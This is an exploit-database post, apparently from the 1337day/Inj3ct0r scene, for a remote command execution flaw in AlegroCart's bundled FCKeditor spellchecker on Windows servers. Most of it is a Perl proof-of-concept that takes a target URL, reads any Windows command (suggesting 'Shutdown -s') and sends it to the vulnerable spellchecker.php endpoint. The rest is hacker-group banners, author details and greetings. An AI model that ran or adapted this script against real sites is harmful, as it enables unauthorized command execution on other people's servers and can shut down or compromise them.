AlegroCart FCKEditor Command Execution

`1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : 1337day.com 0  
1 [+] Support e-mail : submit[at]1337day.com 1  
0 0  
1 ######################################### 1  
0 I'm KedAns-Dz member from Inj3ct0r Team 1  
1 ######################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
###  
# Title : AlegroCart FredCK-Editor (ASPELL for WinSRV) Remote Command Exec p0c  
# Author : KedAns-Dz  
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) [email protected]  
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)  
# Web Site : www.1337day.com  
# Facebook : http://facebook.com/KedAns  
# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com  
# platform : php  
# Type : Remote Command Exec ( Just For Windows SRV's)  
# Security Risk : Highe  
# Tested on : Windows XP-SP3 (Fr)  
###  
  
##  
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |  
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |  
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |  
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |  
# | ------------------------------------------------- < |  
##  
  
# // Exploit-ID Team Welc0m BaCk Br0thEr'S <3 (exploit-id.com) <3  
  
#-> About thE p0c :  
  
+ this p0c about exeC s0me Command's as (spellchecker.php) t0 aspell.exe script !  
  
Working just in Windows Servers Couse Is Desactived in Linux ServerS :::>  
  
["'''''''''''''''''''''''  
# my $aspell_cmd = 'aspell'; # by FredCK (for Linux)  
my $aspell_cmd = '"C:\Program Files\Aspell\bin\aspell.exe"'; # by FredCK (for Windows)  
'''''''''''''''''''''''''"]  
"" spellchecker.php | Line 11->12  
  
// Sp ThanX t0 ' T0x!c ' ( Real BuG by Him >> http://exploit.dis9.com/exploits.php?id=104 )  
  
# Exploit Code :   
  
#!/usr/bin/perl  
system("cls");  
sub logo(){  
print q'  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
1 ______ 0  
0 .-" "-. 1  
1 / KedAns-Dz \ =-=-=-=-=-=-=-=-=-=-=-| 0  
0 Inj3ct0r & Dis9 | & T0x!c | > Site : 1337day.com | 1  
1 --------------- |, .-. .-. ,| > Facebook : /kedans | 0  
0 | )(_o/ \o_)( | > [email protected] | 1  
1 |/ /\ \| =-=-=-=-=-=-=-=-=-=-=| 0  
0 (@_ (_ ^^ _) Algerian HaCkerS 1  
1 _ ) \_______\__|IIIIII|__/_______________________ 0  
0 (_)@8@8{}<________|-\IIIIII/-|________________________> 1  
1 )_/ \ / 0  
0 (@ `--------` © 2012, Inj3ct0r Team | Dis9 UE Team 1  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0  
0 AlegroCart FredCK-Editor (ASPELL for WinSRV) Remote Command Exec p0c 1  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0  
';  
}  
logo();  
print "\n [*] Usage: $0 127.0.0.1\n\n";  
print " [+] Command : win.ini | 0r | Shutdown -s | 0r any WIN32 CMD's \n\n";  
$ARGC=@ARGV;  
if ($ARGC!=1) {   
print "\n [*] f.ex: $0 http://[p0cTrGt].[Tld]\n\n";  
exit(0);   
}  
use LWP::Simple;  
use LWP::UserAgent;  
my $target = shift;  
print "\n [+] Command : ";  
$CMD = <stdin>;  
print " ~~~~~~~~~~~~~~~\n";  
$act = "admin/javascript/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php?cmd=";  
$attack = get("http://" .$target. "/".$act.$CMD);  
print "\n [+] Execute the Command ...\n";  
print "\n [+] p0c by KedAns-Dz ThanX t0 T0x!C ^___^\n";  
sleep(1000);  
  
# The EnD ./ Greetings t0 palestine ./ ^__^ Like aNd Inj0Y  
  
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=======================================  
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Rizky Ariestiyansyah * Islam Caddy * HMD-Cr3w  
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)   
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *   
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta  
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X  
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * r00tw0rm.com * Dis9UE  
# www.packetstormsecurity.org * www.metasploit.com * I-BackTrack * All Security and Exploits Webs ..  
#===================================================================================================  
`